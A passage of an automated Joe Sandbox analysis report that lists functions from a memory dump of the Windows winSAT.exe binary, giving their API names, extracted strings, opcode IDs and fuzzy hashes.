                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$EnabledEventExceptionOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFreeHandleHandlerLastLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$WinSAT registry node is missing and could not be created$A#
                                                                                                                                                                                              • API String ID: 3960188384-1753098087
                                                                                                                                                                                              • Opcode ID: bd410cd55e264f000d01232e2567f6f248b7545a471fa6acb62d77860f969491
                                                                                                                                                                                              • Instruction ID: 9ccf92073b8bbb810230f9e1162e53d2c47b1d98f0e37fc5f67b0951abea98f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: bd410cd55e264f000d01232e2567f6f248b7545a471fa6acb62d77860f969491
                                                                                                                                                                                              • Instruction Fuzzy Hash: 49615F60E0D64395FB60BB11F8502BAEB50BF85788FF89035D54D027E5CEADB454CB61
                                                                                                                                                                                              Function 00007FF780F9EFDD Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 139synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$EnabledEventExceptionOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFreeHandleHandlerLastLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Failed to determine whether WinSAT was launched by AXE.$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3960188384-757361707
                                                                                                                                                                                              • Opcode ID: d2d592f9678acfc1f474ae83ccd7c4ae599ebd627f1dd43af6ba6778f801c080
                                                                                                                                                                                              • Instruction ID: 6e464154311c5a9a7bf6ac9847c20f1d2e655dfd6b5e6c9dfca0254eafec0c0c
                                                                                                                                                                                              • Opcode Fuzzy Hash: d2d592f9678acfc1f474ae83ccd7c4ae599ebd627f1dd43af6ba6778f801c080
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA615F60E0D64295FB60BB11F8502BAEB50BF85748FF8A035D54D027E5CEADB454C761
                                                                                                                                                                                              Function 00007FF780FA0497 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 135synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 3961399675-2825078523
                                                                                                                                                                                              • Opcode ID: 4c8dbb392e71902b56219528c67e97095de549633f4d308d75f6940ab92bb137
                                                                                                                                                                                              • Instruction ID: b834435ef0b88f755d36fca79e474af13162b58f57687ca9cc08a25529e77a0d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c8dbb392e71902b56219528c67e97095de549633f4d308d75f6940ab92bb137
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE616C61E0D64295FB60BB11F8502BAEB50BF85788FF8A035D94E027E5CEADF454CB60
                                                                                                                                                                                              Function 00007FF780FCE3AC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 165fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$CriticalEnabledSectionWrite$CountCurrentEnterFileLeaveProcessTickTransfer_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: %06u (%04u) - %s:%04d:
                                                                                                                                                                                              • API String ID: 3916971103-2080362037
                                                                                                                                                                                              • Opcode ID: 6956f2545bfb37e104e418aad3523fa818e7237dd857e046ff5a47df4cdc9311
                                                                                                                                                                                              • Instruction ID: bb5da82056956805e45869224adebe8d0f1f33435faf4ff11962ea03eae354fc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6956f2545bfb37e104e418aad3523fa818e7237dd857e046ff5a47df4cdc9311
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9817262E08A9286E710AB14E8003B9BBA1FB55779FA48235D95D467D4DF7CE508CB20
                                                                                                                                                                                              Function 00007FF780F9F2E9 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3961399675-1443946128
                                                                                                                                                                                              • Opcode ID: 0235db7363cc9e20dcb545dfc6120c2959dbb1b17df69c66b44caaa3314128ca
                                                                                                                                                                                              • Instruction ID: f38248a14245ee041f926c1f2440001e75d7f290dae0ec72cc58d3fb51cd3373
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0235db7363cc9e20dcb545dfc6120c2959dbb1b17df69c66b44caaa3314128ca
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB616E61E0D64295FB60BB11F8502BAEB50BF85748FF89035D94E027E1DEADF454CB60
                                                                                                                                                                                              Function 00007FF780F9F2A3 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 137synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3961399675-1443946128
                                                                                                                                                                                              • Opcode ID: 9fe70d13609a4a24dfc36d9b439eef4a852a86fc44f791f67cd58d473be66aea
                                                                                                                                                                                              • Instruction ID: d89aca3e01a4d1491ce01bb7fa0b70f931479431272081dfd42e0cf2e9a720a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fe70d13609a4a24dfc36d9b439eef4a852a86fc44f791f67cd58d473be66aea
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD615C60E0D64295FB60BB11F85027AEB50BF85788FF8A035D94E027E6DEADB454C760
                                                                                                                                                                                              Function 00007FF780F9F2C0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 136synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3961399675-1443946128
                                                                                                                                                                                              • Opcode ID: 40a55b160ba2eb895089c50166de5789895156775c95c36c5f7a0b3f1fd81d19
                                                                                                                                                                                              • Instruction ID: f16015e841e933a8a28ca048e75915846a8bd4d27c3cf724a6b429d72deeec41
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40a55b160ba2eb895089c50166de5789895156775c95c36c5f7a0b3f1fd81d19
                                                                                                                                                                                              • Instruction Fuzzy Hash: 93615D60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D94E027E2DEADB454C761
                                                                                                                                                                                              Function 00007FF780F9F2D8 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 135synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandlerLastLibraryModuleMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 868517761-1443946128
                                                                                                                                                                                              • Opcode ID: afbfbdf67aba7433642b57f4c7e86e8f8b5e9d0cc65101911b29ced85cad9477
                                                                                                                                                                                              • Instruction ID: 98130016f36b84e9d86e6c6361562e3128ec603394b5d55481ecae180f0cdb9c
                                                                                                                                                                                              • Opcode Fuzzy Hash: afbfbdf67aba7433642b57f4c7e86e8f8b5e9d0cc65101911b29ced85cad9477
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD616D60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D54E027E2DEADB454C761
                                                                                                                                                                                              Function 00007FF780F9EC69 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 135synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionFreeHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFormatHandlerLastLibraryLocalMessageModuleMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3480508083-1443946128
                                                                                                                                                                                              • Opcode ID: 4708a776195917d4864c938b246512a554b48f90cf80aad21bf0f7a1e7af4f17
                                                                                                                                                                                              • Instruction ID: 050a50d107a974aad3cdfef57cf19ecd881906afb9473d09c9937ddc7bb07fb3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4708a776195917d4864c938b246512a554b48f90cf80aad21bf0f7a1e7af4f17
                                                                                                                                                                                              • Instruction Fuzzy Hash: 14617D60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D54E027E2CEADB454C760
                                                                                                                                                                                              Function 00007FF780F9E514 Relevance: 16.6, APIs: 11, Instructions: 119memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Local$Free$AllocCreateDescriptorKnownSecurityWell$DaclEntriesInitializememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2625181342-0
                                                                                                                                                                                              • Opcode ID: 158f31894646c8a5474cca4ea7009af21b1c226650e5a94d50ff0453d50bbcb4
                                                                                                                                                                                              • Instruction ID: d1046150643b39ecfe9ceaa4a4896a9180dd3b223e442408b798ec3cc3babf96
                                                                                                                                                                                              • Opcode Fuzzy Hash: 158f31894646c8a5474cca4ea7009af21b1c226650e5a94d50ff0453d50bbcb4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B517C36A14A418BE754DF61E8043BDBBB0FB49B99FA58139DE0943B88DF78E404CB50
                                                                                                                                                                                              Function 00007FF780FA3F38 Relevance: 15.2, APIs: 10, Instructions: 207sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide$Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3672326914-0
                                                                                                                                                                                              • Opcode ID: 173bdfa1060e2a4c4da211e687944e001581b1a46b3637e6126f167f1d47a300
                                                                                                                                                                                              • Instruction ID: 0f9956e959e3438c1c60ced1c1e798d29cec2ac97ce015e061904eb0e44df06f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 173bdfa1060e2a4c4da211e687944e001581b1a46b3637e6126f167f1d47a300
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7919E37A08B8596EB689F16E9402ADB7A0FB89B94FA49131DB4D43794CF38F470C710
                                                                                                                                                                                              Function 00007FF780F9DDF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$CreateOpen
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$WinSAT regisrty key missing - create the winsat key$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1299239824-193752149
                                                                                                                                                                                              • Opcode ID: f171cd848e5773a5e2282019252466091d3e16aa69f58741025d92471d8f5cdc
                                                                                                                                                                                              • Instruction ID: 92ac59037df8b752a172f659db16975c8a079e57b6eac406bbe5b00b030bc77b
                                                                                                                                                                                              • Opcode Fuzzy Hash: f171cd848e5773a5e2282019252466091d3e16aa69f58741025d92471d8f5cdc
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3217A32A18B4283EB50AF24F8407B9E6A5FB997A4FB48230DA4D07794DF7CE405CB10
                                                                                                                                                                                              Function 00007FF780FA05A8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
